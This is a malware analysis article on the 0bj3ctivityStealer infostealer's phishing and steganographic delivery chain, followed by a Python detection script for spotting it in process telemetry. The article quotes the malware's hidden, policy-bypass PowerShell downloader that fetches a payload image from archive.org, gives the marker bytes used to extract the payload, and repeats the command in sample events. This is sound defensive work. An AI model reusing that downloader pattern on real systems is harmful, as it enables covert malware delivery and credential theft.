0bj3ctivityStealer’s Execution Chain Unveiled With Its New Capabilities and Exfiltration Techniques
The cybersecurity landscape continues to witness the emergence of sophisticated information-stealing malware, with 0bj3ctivityStealer representing one of the most recent and concerning additions to this threat ecosystem.
Initially discovered by HP Wolf Security experts earlier this year, this advanced stealer has demonstrated a comprehensive arsenal of data exfiltration capabilities targeting a wide variety of applications and sensitive information repositories.
The malware’s sophisticated approach to credential harvesting and system infiltration has positioned it as a significant threat to both individual users and enterprise environments.
The attack methodology employed by 0bj3ctivityStealer follows a well-orchestrated multi-stage execution chain that begins with carefully crafted phishing campaigns.
These malicious emails, typically bearing subjects like “Quotation offer,” contain low-quality images of fabricated purchase orders designed to entice victims into clicking download links.
The social engineering component leverages the promise of high-quality document versions to redirect unsuspecting users to cloud storage platforms, specifically Mediafire, where the initial payload awaits deployment.
Trellix Advanced Research Center (ARC) analysts identified this novel campaign during proactive threat hunting operations, uncovering the malware’s uncommon deployment techniques that set it apart from conventional information stealers.
The researchers noted the sophisticated use of custom PowerShell scripts combined with steganographic techniques to conceal subsequent payload stages, representing an evolution in malware delivery mechanisms that successfully evades traditional detection systems.
The global impact assessment reveals that 0bj3ctivityStealer has achieved widespread distribution across multiple continents, with particularly high detection volumes concentrated in the United States, Germany, and Montenegro.
This geographic distribution pattern suggests an opportunistic rather than targeted approach, with government institutions and manufacturing companies representing the most affected sectors.
The malware’s non-discriminatory targeting methodology indicates a broad-spectrum threat that poses risks to organizations across various industries and geographic regions.
Steganographic Payload Concealment and Multi-Stage Deployment
The technical sophistication of 0bj3ctivityStealer becomes most apparent in its innovative use of steganography for payload concealment and deployment.
The initial JavaScript script, containing over 3,000 lines of code with only 60 lines representing actual malicious functionality, serves as an obfuscation mechanism that effectively hides the embedded PowerShell payload.
This obfuscated PowerShell script subsequently downloads a seemingly benign JPG image from archive.org, which contains the next execution stage hidden within its visual data.
The steganographic extraction process involves searching for a specific hexadecimal pattern (0x42 0x4D 0x32 0x55 0x36 0x00 0x00 0x00 0x00 0x00 0x36 0x00 0x00 0x00 0x28 0x00) within the downloaded image file.
Once located, the malware reads RGB pixel values to reconstruct the hidden .NET DLL payload, with the first four bytes indicating payload size and subsequent data containing the actual executable code along with junk data for additional obfuscation.
powershell -w hidden -noprofile -ep bypass -c "$bombylius="$otolite = "VkFJ'; $bonibell = [System.Convert]::FromBase64String($otolite);$roentgenoscopes = [System.Text.Encoding]::UTF8.GetString($bonibell);Add-Type -AssemblyName System.Drawing;$stouts="https://archive[.]org/download/wp4096799-lost-in-space-wallpapers_20250610/wp4096799-lost-in-space-wallpapers.jpg";
This extracted payload functions as the VMDetector Loader, establishing persistence through scheduled task creation while simultaneously performing comprehensive virtualization and sandbox detection checks.
The loader then retrieves the final 0bj3ctivityStealer payload from a Cloudflare-managed subdomain, implementing process hollowing techniques to inject the malware into legitimate Windows processes like Regasm.exe, thereby maintaining stealth while executing its comprehensive data exfiltration operations.
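For detection engineering, the traits visible in this chain (the hidden, no-profile, policy-bypass PowerShell one-liner that loads System.Drawing and fetches an image from archive.org, and Regasm.exe used as a hollowing host) can be scored from process-creation telemetry. The following Python triage function is an added example written for this write-up, not a Trellix or vendor rule. Field names follow Sysmon-style event keys, the sample events are constructed, and the Regasm heuristics (no assembly argument on the command line, parent is not a build tool) are assumptions made here rather than something the article states.

```python
"""Triage helper: score process-creation events for the delivery chain
described above. Added example; not a vendor rule. Sample events are
constructed, not real telemetry."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Switches the article's one-liner uses to run silently; each counts once.
PS_FLAGS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("execution policy bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
]
# Traits of the steganographic downloader stage quoted in the article.
STEGO_HINTS = [
    ("System.Drawing loaded from script", re.compile(r"Add-Type\s+-AssemblyName\s+System\.Drawing", re.I)),
    ("base64 decode in command line", re.compile(r"FromBase64String", re.I)),
    ("image fetched from archive.org", re.compile(r"archive\[?\.\]?org/download/\S+\.jpe?g", re.I)),
]
BUILD_TOOLS = ("msbuild.exe", "devenv.exe", "visual studio")


def score_powershell(cmd: str) -> List[str]:
    """Names of every indicator present in a PowerShell command line."""
    return [name for name, rx in PS_FLAGS + STEGO_HINTS if rx.search(cmd)]


def score_regasm(ev: Event) -> List[str]:
    """Heuristics (assumed here) for Regasm.exe abused as a hollowing host."""
    reasons = []
    cmd = ev.get("CommandLine", "").strip()
    # RegAsm normally receives an assembly path; a bare launch is suspicious.
    if len(cmd.split()) <= 1:
        reasons.append("Regasm.exe started without an assembly argument")
    parent = ev.get("ParentImage", "").lower()
    if not any(tool in parent for tool in BUILD_TOOLS):
        reasons.append("Regasm.exe parent is not a build tool")
    return reasons


def triage(ev: Event) -> Tuple[int, List[str]]:
    """Return (score, reasons); anything scoring 3 or more deserves a look."""
    image = ev.get("Image", "").lower()
    if image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe"):
        reasons = score_powershell(ev.get("CommandLine", ""))
    elif image.endswith("\\regasm.exe"):
        reasons = score_regasm(ev)
    else:
        reasons = []
    return len(reasons), reasons


# Constructed events: [0] mirrors the article's one-liner, [1] is benign
# PowerShell, [2] is a bare Regasm launch from a user-writable path, [3] is
# a normal Regasm run from MSBuild.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -w hidden -noprofile -ep bypass -c \"$otolite = 'VkFJ'; "
                    "$bonibell = [System.Convert]::FromBase64String($otolite); "
                    "Add-Type -AssemblyName System.Drawing; "
                    "$stouts='https://archive[.]org/download/wp4096799-lost-in-space-"
                    "wallpapers_20250610/wp4096799-lost-in-space-wallpapers.jpg'\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command \"Get-Date\""},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Users\victim\AppData\Roaming\updater.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\MSBuild.exe",
     "CommandLine": r"RegAsm.exe /codebase C:\build\MyLib.dll"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, why = triage(ev)
        print(score, ev["Image"].rsplit("\\", 1)[-1], why)
```

The scoring is deliberately additive: a single switch such as `-NoProfile` is common in administrative scripts and scores 1, while the full combination of silent-execution switches, System.Drawing loading and an archive.org image URL in one command line has no benign explanation and scores 6.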